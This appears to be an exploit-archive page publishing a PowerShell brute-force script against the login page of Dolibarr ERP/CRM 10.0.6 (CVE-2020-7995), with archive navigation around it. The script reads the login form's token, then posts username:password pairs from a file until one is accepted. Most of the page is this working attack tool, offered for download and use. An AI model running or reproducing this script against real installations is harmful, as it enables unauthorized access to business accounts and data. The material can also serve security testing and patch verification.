Dolibarr ERP/CRM 10.0.6 Login Brute Forcer

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer: Posted Jul 19, 2021; Authored by Creamy Chicken Soup; Dolibarr ERP/CRM version 10.0.6 login brute forcing exploit.; tags | exploit, cracker; advisories | CVE-2020-7995; SHA-256 | 63a36f93b7d48318d5fd0616171ef949e346e86520318ffb5ac3b55db0707dba; Download | Favorite | View

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer

# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
# Date:2020-01-18
# Exploit Author: Creamy Chicken Soup
# Vendor Homepage: https://www.dolibarr.org
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 10.0.6
# Tested on: Windows 10 - 64bit
# CVE: CVE-2020-7995

function brute($url,$username,$passwd){
try{
    $WebResponse = Invoke-WebRequest $url
    $a=$WebResponse.Forms.fields
    $fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
    $WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
    if($WebResponse1.Forms.Id -ne "login"){
        Write-Host "username password is match"
        Write-Warning "user: $username ,passwoed: $passwd"
        return $true
       }
}catch{
    Write-Warning "Something Wrong!"
    }
}

function fileinput($filepath,$url){
    try{
        Write-Host "Target: $url"
        $fp=Get-Content -Path $filepath
        foreach($line in $fp){
            $s=$line -split ':'
            $username=$s[0]
            $passwd=$s[1]
            Write-Host "[+] Check $username : $passwd"
            $bf=brute $url $username $passwd
            if($bf -eq $True){
                break
            }
    }
    }catch{
        Write-Warning "File is error"
    }
}

$textart=@'
 ____  ____  _____ ____  _     ___  _ ____  _     _  ____  _  __ _____ _      ____  ____  _     ____ 
/   _\/  __\/  __//  _ \/ \__/|\  \///   _\/ \ /|/ \/   _\/ |/ //  __// \  /|/ ___\/  _ \/ \ /\/  __\
|  /  |  \/||  \  | / \|| |\/|| \  / |  /  | |_||| ||  /  |   / |  \  | |\ |||    \| / \|| | |||  \/|
|  \__|    /|  /_ | |-||| |  || / /  |  \__| | ||| ||  \_ |   \ |  /_ | | \||\___ || \_/|| \_/||  __/
\____/\_/\_\\____\\_/ \|\_/  \|/_/   \____/\_/ \|\_/\____/\_|\_\\____\\_/  \|\____/\____/\____/\_/   
                                                                                                     
'@

Write-Host $textart
Write-Host @'
Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
Date: 2020-01-18
Exploit Author: CreamyChickenSoup
Vendor Homepage: https://www.dolibarr.org
Version: 10.0.6
CVE: CVE-2020-7995
Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
Twitter: @creamychickens1
cve submited:Tufan Gungor
'@
$url=Read-Host "Enter Url:"
$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
fileinput $filepath $url

Top Authors In Last 30 Days

Red Hat 287 files
Ubuntu 60 files
Debian 32 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
liquidsky 3 files
kai6u 3 files
malvuln 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer

Share This

Dolibarr ERP/CRM 10.0.6 Login Brute Forcer

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems